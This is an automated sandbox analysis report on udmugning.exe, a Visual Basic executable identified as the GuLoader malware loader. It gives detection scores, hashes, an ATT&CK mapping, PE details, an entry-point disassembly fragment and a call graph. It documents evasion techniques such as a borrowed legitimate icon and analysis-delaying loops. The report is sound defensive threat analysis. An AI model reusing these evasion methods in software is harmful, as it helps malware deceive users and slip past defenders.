Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report udmugning.exe

Overview

General Information

Sample Name:udmugning.exe
Analysis ID:395203
MD5:3d04ed12388c92e15361681ef1921d7f
SHA1:8820ff07e1f60121a057b0303dc7746ea4960617
SHA256:99227f9bb099737a3f356f266c5b8d5e1f4313715f37a4b7b0b6c1ae65c00925
Infos:

Most interesting Screenshot:

Detection

GuLoader
Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Icon mismatch, binary includes an icon from a different legit application in order to fool users
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Found potential dummy code loops (likely to delay analysis)
Machine Learning detection for sample
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file contains an invalid checksum
PE file contains strange resources
Program does not show much activity (idle)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • udmugning.exe (PID: 3440 cmdline: 'C:\Users\user\Desktop\udmugning.exe' MD5: 3D04ED12388C92E15361681EF1921D7F)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
udmugning.exeJoeSecurity_GuLoader_1Yara detected GuLoaderJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000001.00000002.474162328.0000000000401000.00000020.00020000.sdmpJoeSecurity_GuLoader_1Yara detected GuLoaderJoe Security
      00000001.00000000.206225191.0000000000401000.00000020.00020000.sdmpJoeSecurity_GuLoader_1Yara detected GuLoaderJoe Security

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        1.0.udmugning.exe.400000.0.unpackJoeSecurity_GuLoader_1Yara detected GuLoaderJoe Security
          1.2.udmugning.exe.400000.0.unpackJoeSecurity_GuLoader_1Yara detected GuLoaderJoe Security

            Sigma Overview

            No Sigma rule has matched

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Multi AV Scanner detection for submitted fileShow sources
            Source: udmugning.exeMetadefender: Detection: 35%Perma Link
            Source: udmugning.exeReversingLabs: Detection: 79%
            Machine Learning detection for sampleShow sources
            Source: udmugning.exeJoe Sandbox ML: detected
            Source: udmugning.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: C:\Users\user\Desktop\udmugning.exeCode function: 1_2_0040994D1_2_0040994D
            Source: C:\Users\user\Desktop\udmugning.exeCode function: 1_2_004011CA1_2_004011CA
            Source: C:\Users\user\Desktop\udmugning.exeCode function: 1_2_004099E11_2_004099E1
            Source: C:\Users\user\Desktop\udmugning.exeCode function: 1_2_00409A6E1_2_00409A6E
            Source: udmugning.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: udmugning.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: udmugning.exe, 00000001.00000002.474813749.0000000002300000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs udmugning.exe
            Source: udmugning.exe, 00000001.00000002.485300567.0000000005090000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameSHELL32.DLL.MUIj% vs udmugning.exe
            Source: udmugning.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: classification engineClassification label: mal72.troj.evad.winEXE@1/0@0/0
            Source: C:\Users\user\Desktop\udmugning.exeFile created: C:\Users\user\AppData\Local\Temp\~DF5440564B0D50F574.TMPJump to behavior
            Source: udmugning.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\udmugning.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
            Source: C:\Users\user\Desktop\udmugning.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: udmugning.exeMetadefender: Detection: 35%
            Source: udmugning.exeReversingLabs: Detection: 79%

            Data Obfuscation:

            barindex
            Yara detected GuLoaderShow sources
            Source: Yara matchFile source: udmugning.exe, type: SAMPLE
            Source: Yara matchFile source: 00000001.00000002.474162328.0000000000401000.00000020.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000000.206225191.0000000000401000.00000020.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 1.0.udmugning.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.udmugning.exe.400000.0.unpack, type: UNPACKEDPE
            Source: udmugning.exeStatic PE information: real checksum: 0x1fc2a should be: 0x22a75
            Source: C:\Users\user\Desktop\udmugning.exeCode function: 1_2_0040414F push ebp; iretd 1_2_004041A3
            Source: C:\Users\user\Desktop\udmugning.exeCode function: 1_2_0040C126 push 7600FFCEh; iretd 1_2_0040C12B
            Source: C:\Users\user\Desktop\udmugning.exeCode function: 1_2_00409138 push eax; iretd 1_2_00409139
            Source: C:\Users\user\Desktop\udmugning.exeCode function: 1_2_004011CA push 02A3CF73h; iretd 1_2_0040141C
            Source: C:\Users\user\Desktop\udmugning.exeCode function: 1_2_004039D5 push esp; iretd 1_2_004039DB
            Source: C:\Users\user\Desktop\udmugning.exeCode function: 1_2_0040877A push ebx; ret 1_2_00408782
            Source: C:\Users\user\Desktop\udmugning.exeCode function: 1_2_0040C7DE pushad ; ret 1_2_0040C813
            Source: C:\Users\user\Desktop\udmugning.exeCode function: 1_2_004067F8 push es; iretd 1_2_00406802

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Icon mismatch, binary includes an icon from a different legit application in order to fool usersShow sources
            Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (71).png
            Source: C:\Users\user\Desktop\udmugning.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\udmugning.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\udmugning.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\udmugning.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\udmugning.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\udmugning.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\udmugning.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\udmugning.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\udmugning.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\udmugning.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\udmugning.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\udmugning.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\udmugning.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\udmugning.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\udmugning.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\udmugning.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\udmugning.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\udmugning.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\udmugning.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\udmugning.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\udmugning.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\udmugning.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\udmugning.exeWindow / User API: threadDelayed 4610Jump to behavior
            Source: C:\Users\user\Desktop\udmugning.exeWindow / User API: threadDelayed 5389Jump to behavior
            Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
            Source: C:\Users\user\Desktop\udmugning.exeLast function: Thread delayed

            Anti Debugging:

            barindex
            Found potential dummy code loops (likely to delay analysis)Show sources
            Source: C:\Users\user\Desktop\udmugning.exeProcess Stats: CPU usage > 90% for more than 60s
            Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
            Source: udmugning.exe, 00000001.00000002.474603838.0000000000DA0000.00000002.00000001.sdmpBinary or memory string: Program Manager
            Source: udmugning.exe, 00000001.00000002.474603838.0000000000DA0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
            Source: udmugning.exe, 00000001.00000002.474603838.0000000000DA0000.00000002.00000001.sdmpBinary or memory string: Progman
            Source: udmugning.exe, 00000001.00000002.474603838.0000000000DA0000.00000002.00000001.sdmpBinary or memory string: Progmanlock

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management InstrumentationPath InterceptionProcess Injection1Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion11LSASS MemoryVirtualization/Sandbox Evasion11Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection1Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information1NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsSystem Information Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            udmugning.exe35%MetadefenderBrowse
            udmugning.exe79%ReversingLabsWin32.Trojan.VBObfuse
            udmugning.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            No Antivirus matches

            Domains and IPs

            Contacted Domains

            No contacted domains info

            Contacted IPs

            No contacted IP infos

            General Information

            Joe Sandbox Version:31.0.0 Emerald
            Analysis ID:395203
            Start date:22.04.2021
            Start time:09:55:58
            Joe Sandbox Product:CloudBasic
            Overall analysis duration:0h 5m 11s
            Hypervisor based Inspection enabled:false
            Report type:full
            Sample file name:udmugning.exe
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
            Number of analysed new started processes analysed:23
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • HDC enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Detection:MAL
            Classification:mal72.troj.evad.winEXE@1/0@0/0
            EGA Information:
            • Successful, ratio: 100%
            HDC Information:
            • Successful, ratio: 97.7% (good quality ratio 48.7%)
            • Quality average: 27%
            • Quality standard deviation: 30.5%
            HCA Information:Failed
            Cookbook Comments:
            • Adjust boot time
            • Enable AMSI
            • Found application associated with file extension: .exe
            Warnings:
            Show All
            • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
            • VT rate limit hit for: /opt/package/joesandbox/database/analysis/395203/sample/udmugning.exe

            Simulations

            Behavior and APIs

            No simulations

            Joe Sandbox View / Context

            IPs

            No context

            Domains

            No context

            ASN

            No context

            JA3 Fingerprints

            No context

            Dropped Files

            No context

            Created / dropped Files

            No created / dropped files found

            Static File Info

            General

            File type:PE32 executable (GUI) Intel 80386, for MS Windows
            Entropy (8bit):5.747482043975765
            TrID:
            • Win32 Executable (generic) a (10002005/4) 99.15%
            • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
            • Generic Win/DOS Executable (2004/3) 0.02%
            • DOS Executable Generic (2002/1) 0.02%
            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
            File name:udmugning.exe
            File size:118784
            MD5:3d04ed12388c92e15361681ef1921d7f
            SHA1:8820ff07e1f60121a057b0303dc7746ea4960617
            SHA256:99227f9bb099737a3f356f266c5b8d5e1f4313715f37a4b7b0b6c1ae65c00925
            SHA512:39d85417c5667971a8b84eb358656672a2291c8e52143633591c6c5afd7d1a45d6cdd837002797f509e071aa508cee300097c65642cf5ba7d5fc3c6874f08c9f
            SSDEEP:1536:o96yzDtLzOdb4E4Ql9p9LUaYu/+QR15nZ5ioT1VnrveqOrNThdFfwuqltL:oHDtLzOdDLhemaFf
            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L......O.................p...`......h.............@................

            File Icon

            Icon Hash:c0c6f2e0e4fefe3f

            Static PE Info

            General

            Entrypoint:0x401968
            Entrypoint Section:.text
            Digitally signed:false
            Imagebase:0x400000
            Subsystem:windows gui
            Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            DLL Characteristics:
            Time Stamp:0x4FE4DC12 [Fri Jun 22 20:56:50 2012 UTC]
            TLS Callbacks:
            CLR (.Net) Version:
            OS Version Major:4
            OS Version Minor:0
            File Version Major:4
            File Version Minor:0
            Subsystem Version Major:4
            Subsystem Version Minor:0
            Import Hash:7677b40f5f8927412a58af017314f1ed

            Entrypoint Preview

            Instruction
            push 0040F3B0h
            call 00007F70D0F0A383h
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            xor byte ptr [eax], al
            add byte ptr [eax], al
            cmp byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            cmp al, 47h
            add eax, 838AF2EAh
            dec esp
            xchg dword ptr [edx-41h], esp
            popfd
            sub eax, 0066210Bh
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [ecx], al
            add byte ptr [eax], al
            add byte ptr [ecx+00h], al
            push es
            push eax
            xchg eax, ebx
            add dl, byte ptr [esi+65h]
            jnc 00007F70D0F0A406h
            jnc 00007F70D0F0A392h
            and al, 02h
            add byte ptr [eax], al
            add byte ptr [eax], al
            dec esp
            xor dword ptr [eax], eax
            or al, 79h
            push ebx
            mov esi, 80015E4Dh
            dec edx
            lodsd
            stc
            xchg eax, ebx
            or al, bl
            mov ch, 73h
            sub ebp, ebx
            xor dword ptr [edx+5CEADEADh], edi
            dec edi
            mov dword ptr [AAF3C737h], eax
            xchg eax, esi
            movsd
            add byte ptr [edx], bh
            dec edi
            lodsd
            xor ebx, dword ptr [ecx-48EE309Ah]
            or al, 00h
            stosb
            add byte ptr [eax-2Dh], ah
            xchg eax, ebx
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            aaa
            fld dword ptr [eax]
            add byte ptr [ecx], bh
            xlatb
            add byte ptr [eax], al
            add byte ptr [ebx], cl
            add byte ptr [esi+61h], al
            insb
            imul esp, dword ptr [edi+68h], 72656465h
            add byte ptr [55000601h], cl
            outsb
            outsd
            jc 00007F70D0F0A3F3h
            insb
            add byte ptr [ecx], bl
            add dword ptr [eax], eax
            inc edx

            Data Directories

            NameVirtual AddressVirtual Size Is in Section
            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IMPORT0x176240x28.text
            IMAGE_DIRECTORY_ENTRY_RESOURCE0x1a0000x382a.rsrc
            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2280x20
            IMAGE_DIRECTORY_ENTRY_IAT0x10000x1a8.text
            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

            Sections

            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
            .text0x10000x16c080x17000False0.446204144022data6.13431444514IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            .data0x180000x12600x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
            .rsrc0x1a0000x382a0x4000False0.461853027344data5.140747892IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

            Resources

            NameRVASizeTypeLanguageCountry
            RT_ICON0x1cf820x8a8data
            RT_ICON0x1c8ba0x6c8data
            RT_ICON0x1c3520x568GLS_BINARY_LSB_FIRST
            RT_ICON0x1b2aa0x10a8data
            RT_ICON0x1a9220x988data
            RT_ICON0x1a4ba0x468GLS_BINARY_LSB_FIRST
            RT_GROUP_ICON0x1a4600x5adata
            RT_VERSION0x1a1e00x280dataEnglishUnited States

            Imports

            DLLImport
            MSVBVM60.DLL_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaLenBstr, __vbaStrVarMove, __vbaFreeVarList, __vbaEnd, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaSetSystemError, __vbaHresultCheckObj, __vbaLenBstrB, _adj_fdiv_m32, __vbaAryDestruct, __vbaOnError, __vbaObjSet, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaFpR8, __vbaVarTstLt, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaStrCmp, __vbaObjVar, DllFunctionCall, _adj_fpatan, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaStrVarVal, _CIlog, __vbaNew2, __vbaInStr, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaI4Str, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaLateMemCall, __vbaVarAdd, __vbaStrToAnsi, __vbaVarDup, __vbaFpI4, __vbaLateMemCallLd, _CIatan, __vbaStrMove, _allmul, __vbaLateIdSt, _CItan, __vbaFPInt, _CIexp, __vbaFreeStr, __vbaFreeObj

            Version Infos

            DescriptionData
            Translation0x0409 0x04b0
            InternalNameudmugning
            FileVersion1.00
            CompanyNameCluster-C
            CommentsCluster-C
            ProductNameCluster-C
            ProductVersion1.00
            FileDescriptionCluster-C
            OriginalFilenameudmugning.exe

            Possible Origin

            Language of compilation systemCountry where language is spokenMap
            EnglishUnited States

            Network Behavior

            No network behavior found

            Code Manipulations

            Statistics

            CPU Usage

            Click to jump to process

            Memory Usage

            Click to jump to process

            High Level Behavior Distribution

            Click to dive into process behavior distribution

            System Behavior

            Analysis Process: udmugning.exe PID: 3440 Parent PID: 5600

            General

            Start time:09:56:48
            Start date:22/04/2021
            Path:C:\Users\user\Desktop\udmugning.exe
            Wow64 process (32bit):true
            Commandline:'C:\Users\user\Desktop\udmugning.exe'
            Imagebase:0x400000
            File size:118784 bytes
            MD5 hash:3D04ED12388C92E15361681EF1921D7F
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:Visual Basic
            Yara matches:
            • Rule: JoeSecurity_GuLoader_1, Description: Yara detected GuLoader, Source: 00000001.00000002.474162328.0000000000401000.00000020.00020000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_GuLoader_1, Description: Yara detected GuLoader, Source: 00000001.00000000.206225191.0000000000401000.00000020.00020000.sdmp, Author: Joe Security
            Reputation:low

            Chronological Activities

            Disassembly

            Code Analysis

            Reset < >

              Analysis Process: udmugning.exe PID: 3440 Parent PID: 5600 udmugning.exeCOMMON

              Execution Graph

              Execution Coverage:4.2%
              Dynamic/Decrypted Code Coverage:1.3%
              Signature Coverage:0%
              Total number of Nodes:389
              Total number of Limit Nodes:28

              Graph

              execution_graph 3301 415587 __vbaChkstk 3302 4155d5 3301->3302 3303 4155bd __vbaNew2 3301->3303 3304 415615 3302->3304 3305 4155fe __vbaHresultCheckObj 3302->3305 3303->3302 3306 415659 3304->3306 3307 41563f __vbaHresultCheckObj 3304->3307 3305->3304 3308 41565d __vbaFreeObj #673 __vbaFpR8 3306->3308 3307->3308 3309 4156ac __vbaFreeVar 3308->3309 3311 4156d2 #571 3309->3311 3312 4156df __vbaI4Str #697 __vbaStrMove __vbaStrCmp __vbaFreeStr 3309->3312 3311->3312 3313 415724 3312->3313 3314 4157c8 3312->3314 3315 415745 3313->3315 3316 41572d __vbaNew2 3313->3316 3317 415785 3315->3317 3318 41576e __vbaHresultCheckObj 3315->3318 3316->3315 3319 4157a5 __vbaHresultCheckObj 3317->3319 3320 4157bc 3317->3320 3318->3317 3321 4157c0 __vbaFreeObj 3319->3321 3320->3321 3321->3314 3239 416106 __vbaChkstk __vbaStrCopy 3240 416147 __vbaNew2 3239->3240 3241 41615f 3239->3241 3240->3241 3242 416188 __vbaHresultCheckObj 3241->3242 3243 41619f 3241->3243 3242->3243 3244 4161e0 3243->3244 3245 4161c6 __vbaHresultCheckObj 3243->3245 3246 4161e4 __vbaStrMove __vbaFreeObj __vbaFPInt __vbaFpR8 3244->3246 3245->3246 3247 416255 __vbaFreeStr __vbaFreeStr 3246->3247 3248 41621c __vbaFpI4 3246->3248 3250 416233 3248->3250 3250->3247 3251 41623e __vbaHresultCheckObj 3250->3251 3251->3247 3130 41500b __vbaChkstk #675 __vbaFpR8 3131 41508d __vbaFreeVarList 3130->3131 3133 4150f1 __vbaFreeStr 3131->3133 3134 4150bd __vbaVarDup #667 __vbaStrMove __vbaFreeVar 3131->3134 3134->3133 3322 41538b __vbaChkstk __vbaVarDup #717 __vbaVarTstNe __vbaFreeVarList 3323 415521 __vbaFreeStr 3322->3323 3324 415421 3322->3324 3326 41542a __vbaNew2 3324->3326 3327 415445 3324->3327 3326->3327 3328 415474 __vbaHresultCheckObj 3327->3328 3329 41548e 3327->3329 3330 415495 __vbaChkstk 3328->3330 3329->3330 3331 4154c9 3330->3331 3332 4154f7 3331->3332 3333 4154da __vbaHresultCheckObj 3331->3333 3334 4154fe __vbaStrMove __vbaFreeObj 3332->3334 3333->3334 3334->3323 3185 415c93 __vbaChkstk __vbaVarDup #542 __vbaVarTstNe __vbaFreeVarList 3186 415e46 6 API calls 3185->3186 3187 415d3a 3185->3187 3188 415fc9 #610 #557 __vbaFreeVar 3186->3188 3193 415ed0 3186->3193 3189 415d43 __vbaNew2 3187->3189 3194 415d5e 3187->3194 3190 416000 __vbaVarDup #600 __vbaFreeVar 3188->3190 3191 416035 __vbaFreeStr 3188->3191 3189->3194 3190->3191 3195 415f13 3193->3195 3196 415ef3 __vbaHresultCheckObj 3193->3196 3197 415dbc 3194->3197 3198 415d9c __vbaHresultCheckObj 3194->3198 3199 415f23 __vbaNew2 3195->3199 3200 415f3e 3195->3200 3196->3195 3203 415e1c 3197->3203 3204 415dfc __vbaHresultCheckObj 3197->3204 3198->3197 3201 415f48 __vbaObjSet 3199->3201 3200->3201 3202 415f89 3201->3202 3205 415fba 3202->3205 3206 415f9a __vbaHresultCheckObj 3202->3206 3207 415e23 __vbaStrMove __vbaFreeObj 3203->3207 3204->3207 3208 415fc1 __vbaFreeObj 3205->3208 3206->3208 3207->3186 3208->3188 3209 416092 __vbaChkstk #648 __vbaFreeVar 3210 4160f2 3209->3210 3335 416b95 __vbaChkstk 3336 416bd5 3335->3336 3337 416bf6 3336->3337 3338 416bde __vbaNew2 3336->3338 3339 416c36 3337->3339 3340 416c1f __vbaHresultCheckObj 3337->3340 3338->3337 3341 416c71 3339->3341 3342 416c5a __vbaHresultCheckObj 3339->3342 3340->3339 3343 416c75 __vbaStrCmp __vbaFreeStr __vbaFreeObj 3341->3343 3342->3343 3344 416ca2 __vbaVarDup #529 __vbaFreeVar 3343->3344 3345 416ccc #696 3343->3345 3344->3345 3348 416cdc 3345->3348 3350 416d0d 3345->3350 3346 416d32 3351 416d72 3346->3351 3352 416d5b __vbaHresultCheckObj 3346->3352 3347 416d1a __vbaNew2 3347->3346 3349 416cf3 __vbaHresultCheckObj 3348->3349 3348->3350 3349->3350 3350->3346 3350->3347 3353 416db3 3351->3353 3354 416d99 __vbaHresultCheckObj 3351->3354 3352->3351 3355 416db7 __vbaStrMove __vbaFreeObj 3353->3355 3354->3355 3356 416dfe __vbaFreeStr 3355->3356 3252 414d17 __vbaChkstk 3253 414d57 __vbaStrCopy #712 __vbaStrMove __vbaStrCmp 3252->3253 3254 414dfd 3253->3254 3255 414d94 __vbaFpI4 3253->3255 3256 414e22 3254->3256 3257 414e0a __vbaNew2 3254->3257 3258 414dd8 3255->3258 3260 414e62 3256->3260 3261 414e4b __vbaHresultCheckObj 3256->3261 3257->3256 3258->3254 3259 414de3 __vbaHresultCheckObj 3258->3259 3259->3254 3262 414ea3 3260->3262 3263 414e89 __vbaHresultCheckObj 3260->3263 3261->3260 3264 414ea7 __vbaFreeObj __vbaLenBstr 3262->3264 3263->3264 3265 414ec6 __vbaInStr 3264->3265 3266 414edf __vbaFreeStr 3264->3266 3265->3266 3211 416296 __vbaChkstk 3212 4162d6 3211->3212 3213 4162f7 3212->3213 3214 4162df __vbaNew2 3212->3214 3215 416320 __vbaHresultCheckObj 3213->3215 3216 416337 3213->3216 3214->3213 3215->3216 3217 416378 3216->3217 3218 41635e __vbaHresultCheckObj 3216->3218 3219 41637c __vbaStrMove __vbaFreeObj 3217->3219 3218->3219 3220 4163bf __vbaFreeStr 3219->3220 3110 416665 6 API calls 3111 416723 __vbaVarDup #542 __vbaVarTstNe __vbaFreeVarList 3110->3111 3112 4166ea __vbaVarDup #666 __vbaVarMove __vbaFreeVar 3110->3112 3113 416898 __vbaFreeStr __vbaFreeVar 3111->3113 3114 41678c 3111->3114 3112->3111 3116 416795 __vbaNew2 3114->3116 3117 4167b0 3114->3117 3116->3117 3118 41680e 3117->3118 3119 4167ee __vbaHresultCheckObj 3117->3119 3120 41686e 3118->3120 3121 41684e __vbaHresultCheckObj 3118->3121 3119->3118 3122 416875 __vbaStrMove __vbaFreeObj 3120->3122 3121->3122 3122->3113 3221 414aa5 __vbaChkstk #556 3222 414b6a __vbaAryDestruct __vbaFreeStr 3221->3222 3223 414aee 3221->3223 3224 414af7 __vbaNew2 3223->3224 3225 414b0f 3223->3225 3224->3225 3227 414b51 3225->3227 3228 414b3a __vbaHresultCheckObj 3225->3228 3229 414b55 __vbaStrMove 3227->3229 3228->3229 3229->3222 3108 401968 #100 3109 4019a8 3108->3109 3230 415b68 __vbaChkstk 3231 415ba8 #598 __vbaStrToAnsi 3230->3231 3237 411544 3231->3237 3238 41154d 3237->3238 3268 40172d _adj_fdivr_m64 3357 4173ac __vbaChkstk 3358 4173ec 3357->3358 3359 4173f5 __vbaNew2 3358->3359 3360 41740d 3358->3360 3359->3360 3361 417436 __vbaHresultCheckObj 3360->3361 3362 41744d 3360->3362 3361->3362 3363 417474 __vbaHresultCheckObj 3362->3363 3364 41748e 3362->3364 3365 417492 6 API calls 3363->3365 3364->3365 3366 4174f0 3365->3366 3367 4175cc __vbaFreeStr __vbaFreeStr 